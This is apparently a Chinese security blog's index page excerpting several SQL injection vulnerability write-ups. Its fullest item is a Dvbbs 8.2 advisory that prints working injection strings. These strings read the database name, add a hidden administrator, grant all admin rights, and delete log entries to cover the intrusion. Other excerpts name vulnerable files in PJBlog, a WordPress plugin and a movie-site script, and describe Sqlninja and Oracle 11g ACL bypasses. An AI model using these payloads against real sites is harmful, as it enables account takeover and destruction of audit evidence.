Exploiting SQL Injection from Web Applications
This paper discusses the exploitation techniques available for exploiting SQL Injection from web applications against the Oracle database.
Download PDF
睛天电影系统 Sql Injection Vulnerability 0day
Author: My5t3ry
Official site: http://www.qingtiandy.cn/
vulnerable: /look/template/wmv.asp
Code: 阅读全文
<%
IF Not ChkPost() Then
response.Redirect G_error_page_1
response.End()
End IF
SSV ID:15206
SEBUG-Appdir:动网(DVBBS)
发布时间:2009-12-31
影响版本:
Dvbbs 8.2
漏洞描述:
DVBBS是一款由WWW.ASPSKY.NET开发和维护的开放源码Asp论坛程序。
<*参考
暂无
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
发帖子,标题为下面的sql语句,然后点评论。0为中立, 1为支持, 2为反对 都行。
这时sql语句被执行
库名:a','',1,'akai','2008-2-4','',2);update/**/dv_user/**/set/**/useremail=db_name()/**/where/**/username='akai'--
复制代码加前台和后台管理员:a','',1,'akai','2008-2-4','',2);update dv_user set UserGroupID=1 where username='akai';insert into dv_admin(Username,Password,Flag,Adduser)values('akai','965eb72c92a549dd',',4,','akai')--
复制代码进入后台,通过注入再获取全部权限:http://www.xxx.com/Admin/help.asp?action=view&id=1;update/**/dv_admin/**/set/**/flag='1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45'/**/where/**/username='akai'--
复制代码清理数据库记录(有三个表):http://www.xxx.com/Admin/help.asp?action=view&id=1;delete/**/from/**/dv_log/**/where/**/l_username='akai';delete/**/from/**/dv_topic/**/where/**/PostUsername='akai';delete/**/from/**/Dv_Appraise/**/where/**/UserName='akai'--
复制代码(因为是通过后台注入来执行delete语句,所以最后Dv_log还是有一条关于后台help.asp文件访问记录)
SEBUG安全建议:
暂无 请参考官方补丁 www.dvbbs.net
// sebug.net [2010-01-07]
最近在找Linux下的Sql注入软件,以前只用过Sqlmap,今天尝试了一下Sqlninja,这款软件的简介:
Sqlninja’s goal is to exploit SQL injection vulnerabilities on web applications that use Microsoft SQL Server as back end. It is released under the GPLv2.
There are a lot of other SQL injection tools out there but sqlninja, instead of extracting the data, focuses on getting an interactive shell on the remote DB server and using it as a foothold in the target network. In a nutshell, here’s what it does:
阅读全文
WordPress Plugin Related Sites 2.1 BlindSQLinj Vuln http://wordpress.org/extend/plugins/related-sites/ /wp-content/plugins/related-sites/BTE_RW_webajax.php eLwaux(c) 30.05.2009, uasc.org.ua SQL-Inj 27: $guid = $_POST['guid']; 28: $click = $_POST['click']; 31: $ref = $_SERVER["HTTP_REFERER"];阅读全文
影响版本:PJBlog 3.0.6.170
程序介绍:
PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术。
漏洞分析:
在文件class/cls_logAction.asp中:
oldcate=request.form("oldcate") //第429行
oldctype=request.form("oldtype")
阅读全文
From: Alexander Kornbrust
This blog entry will show a SQL Injection example based on a JSP application (tnx to Slavik) and Oracle 11.1.0.7. Oracle SQL Injection Cheat Sheet Sheet is available on our webpage.
With Oracle 11g, Oracle introduced some security enhancements by default, e.g. the ACL for PLSQL packages accessing the network. These packages are UTL_HTTP, UTL_INADDR, UTL_TCP, … Some old well known tricks like the usage of utl_inaddr are no longer working for non-DBAs in 11g… The following tutorial will show how to bypass these restrictions and will show some new tricks…
First we start with with a vulnerable webapp:
阅读全文
订阅我的博客
